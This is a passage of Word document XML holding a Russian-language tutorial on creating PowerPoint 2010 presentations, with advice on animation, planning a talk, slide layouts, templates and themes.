          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Никогда не применяйте аним</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ацию в слайде без необходимости. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerPoint позволяет анимировать даже смену слайдов на экране. К этой возможности нужно относиться столь же осторожно, что и к анимации. Главным </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>аниматором</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и инициатором смены слайдов доложен быть докладчик. В момент смены слайда, лучше постараться привлечь внимание к докладчику, а не к экрану. Например, достаточно произнести: </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сейчас я взмахну рукой, и на экране появится график роста наших доходов, но прежде, отмечу…</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Пока зрители напряглись в ожидании взмаха руки, можно успеть сказать нечто важное.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 1. Продумать вс</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> до мелочей</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нельзя забывать, что презентация – это сопровождение доклада или выступления, а ни в коем случае не его замена. Поэтому сначала необходимо разработать концепцию выступления, а затем уже браться за составление презентации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для этого постарайтесь ответить себе на следующие вопросы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Какова цель используемой презентации?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Каковы особенности слушателей?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Какова продолжительность презентации и планируемое содержание?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание презентаций</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание презентаций в PowerPoint начинается с традиционного запуска программы. Затем с помощью функции </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать слайд</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, расположенной в правом верхнем углу панели навигации, выбирается макет слайда. Выбранный макет можно применить не только для всей презентации, но и подобрать для каждого слайда в отдельности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2169750" cy="1145886"/>
            <wp:effectExtent l="19050" t="0" r="1950" b="0"/>
            <wp:docPr id="24826" name="Рисунок 24826" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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6" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image160.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId499" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2174782" cy="1148544"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Самое первое окно программы MicrosoftPowerPoint 2010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полезный совет:</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не размещайте на одном слайде сразу несколько блоков зрительной или текстовой информации. Это отвлекает, рассеивает внимание, ухудшает концентрацию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для новых презентаций PowerPoint по умолчанию использует шаблон презентации. Чтобы создать новую презентацию на основе шаблона PowerPoint, надо нажать кнопку Office и в открывшемся меню выбрать команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. В появившемся окне в группе </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаблоны</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пустые и последние</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и дважды щ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">лкните по кнопке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Новая презентация</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2536950" cy="1411484"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="24827" name="Рисунок 24827" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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7" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image161.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId500" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2542148" cy="1414376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание новой презентации в PowerPoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00577AD5" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 3. </w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаблоны для PowerPoint можно выбрать и с помощью команды </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установленные шаблоны</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, где найд</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">те шаблоны </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Классический фотоальбом</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Современный фотоальбом</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рекламный буклет</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Викторина</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Широкоэкранная презентация</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 4. Быть в теме!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы придать презентации PowerPoint желаемый внешний вид, по вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дизайн</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> надо перейти в группу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Темы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и щ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">лкнуть по нужной теме документа. Чтобы изменить внешний вид слайдов, на вкладке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Слайды</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выберите нужные слайды, щ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">лкните правой кнопкой мыши по теме, которую нужно применить к этим слайдам, и в контекстном меню выберите команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Применить к выделенным слайдам</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2537968" cy="1648800"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="24840" name="Рисунок 24840" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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40" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image162.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId501" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2541896" cy="1651352"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбор темы презентации PowerPoint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00577AD5" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 5. </w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Темы для PowerPoint, собранные в программе, универсальны для всех видов презентаций. А с помощью кнопок </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цвета</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
